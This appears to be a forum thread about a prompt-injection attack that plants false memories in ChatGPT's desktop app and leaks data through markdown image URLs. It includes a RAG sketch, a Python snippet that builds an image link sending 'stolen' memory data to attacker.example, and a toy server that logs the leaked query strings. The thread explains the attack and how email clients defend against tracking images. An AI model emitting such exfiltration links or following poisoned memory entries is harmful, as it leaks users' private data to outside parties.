I don’t know anything about tech, so please bear with your mom’s work friend (me) being ignorant about technology for a second.
I thought the whole issue with generative AI as it stands was that it’s equally confident in truth and nonsense, with no way to distinguish the two. Is there actually a way to get it to “remember” true things and not just make up things that seem like they could be true?
The memory feature of ChatGPT is basically like a human taking notes. The AI can also pull in other documents for reference; that technique is called retrieval-augmented generation (RAG). -> https://en.wikipedia.org/wiki/Retrieval-augmented_generation
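To make that concrete: RAG really is just “search, then paste into the prompt.” A toy sketch of the idea; the notes, the keyword-overlap retriever, and `call_llm` are all made up for illustration (real systems use embeddings and a vector index, not word overlap):

```python
# Minimal sketch of RAG: fetch relevant notes, paste them into the prompt.

notes = [
    "User's cat is named Miso.",
    "User prefers metric units.",
    "User's quarterly report is due on the 15th.",
]

def call_llm(prompt: str) -> str:
    # Stand-in for a real model API call.
    return f"(model would answer based on {len(prompt)} chars of prompt)"

def retrieve(query: str, docs: list[str], k: int = 2) -> list[str]:
    """Rank docs by how many words they share with the query, return top k."""
    q = set(query.lower().split())
    return sorted(docs, key=lambda d: len(q & set(d.lower().split())), reverse=True)[:k]

def answer(query: str) -> str:
    context = "\n".join(retrieve(query, notes))
    return call_llm(f"Notes that may be relevant:\n{context}\n\nQuestion: {query}")

print(answer("What is the cat named?"))
```

Nothing is “remembered” inside the model; the notes are glued onto the prompt each time. That’s also why poisoned notes are a problem: whatever lands in memory gets pasted into every future prompt.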
Sidenote. This isn’t the place to ask technical questions about AI. It’s like asking your friendly neighborhood evangelical about evolution.
tl;dr
- it affects the ChatGPT desktop app, but likely any client that offers long-term memory functionality.
- does not apply to the web interface.
- does not apply to API access.
- the data exfiltration is visible to the user: GPT streams the tokens that form the exfiltration URL as a (fake) markdown image (see the sketch below).
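Roughly what such a payload looks like: a client that auto-renders markdown images will fire a GET request for the URL, query string and all. The attacker domain and the “stolen” data here are made up:

```python
from urllib.parse import quote

# Hypothetical data the injected instructions tell the model to leak.
stolen = "memory: user's email is alice@example.com"

# If the model streams this markdown and the client renders it as an image,
# the client fetches the URL automatically, handing the payload to the server.
markdown = f"![ ](https://attacker.example/pixel.gif?d={quote(stolen)})"
print(markdown)
# ![ ](https://attacker.example/pixel.gif?d=memory%3A%20user%27s%20email%20is%20alice%40example.com)
```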
false memories in ChatGPT
How is the application able to send data to an arbitrary website? Even if you, as the legit user, explicitly asked it to do that?
Haven’t read the details, but the classic way is to get the system to visit: site.com/badimage.gif?data=abcd
Note: that’s also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.
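On the receiving side there’s nothing clever at all; the data just shows up in the request. A toy receiver (everything here is illustrative):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class PixelHandler(BaseHTTPRequestHandler):
    # Toy "tracking pixel": the payload arrives in the query string the
    # moment anything fetches the image URL.
    def do_GET(self):
        data = parse_qs(urlparse(self.path).query).get("data", ["<none>"])[0]
        print("received:", data)            # attacker just reads the log
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()
        self.wfile.write(b"GIF89a")         # minimal stub, not a real image

if __name__ == "__main__":
    HTTPServer(("", 8000), PixelHandler).serve_forever()
```

Hit http://localhost:8000/badimage.gif?data=abcd and “abcd” lands in the log. Same mechanism whether the fetcher is a browser, a mail client, or a chat app rendering markdown.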
This is why every single email client for the past 2+ decades has blocked external images. This didn’t occur to the AI geniuses?
IME they usually proxy and/or prefetch images for caching instead of blocking them. Only spam content is blocked by default.
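Gmail-style, in other words: the client rewrites image URLs to go through its own proxy, so the sender’s server sees the proxy rather than the reader. A sketch of the rewrite (the proxy host is made up):

```python
from urllib.parse import quote

PROXY = "https://img-proxy.example/fetch?url="  # hypothetical proxy endpoint

def rewrite_src(original_url: str) -> str:
    # The client serves the image via its own proxy/cache, so the sender
    # sees the proxy's IP instead of the reader's.
    return PROXY + quote(original_url, safe="")

print(rewrite_src("https://site.com/badimage.gif?data=abcd"))
# https://img-proxy.example/fetch?url=https%3A%2F%2Fsite.com%2Fbadimage.gif%3Fdata%3Dabcd
```

Note that the unique query string survives the rewrite, so a per-recipient URL can still reveal the open; proxying mainly hides the reader’s IP and client details.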
I don’t understand. Why can’t ChatGPT be a good bot and keep a secret?
It’s a very OpenAI
emails
Look: if the article can’t pluralize properly, I’m out.
Am I missing something? Isn’t “emails” correct?
What is the plural of mail? ;)
Mails… And the plural of email is emails, so what is the problem?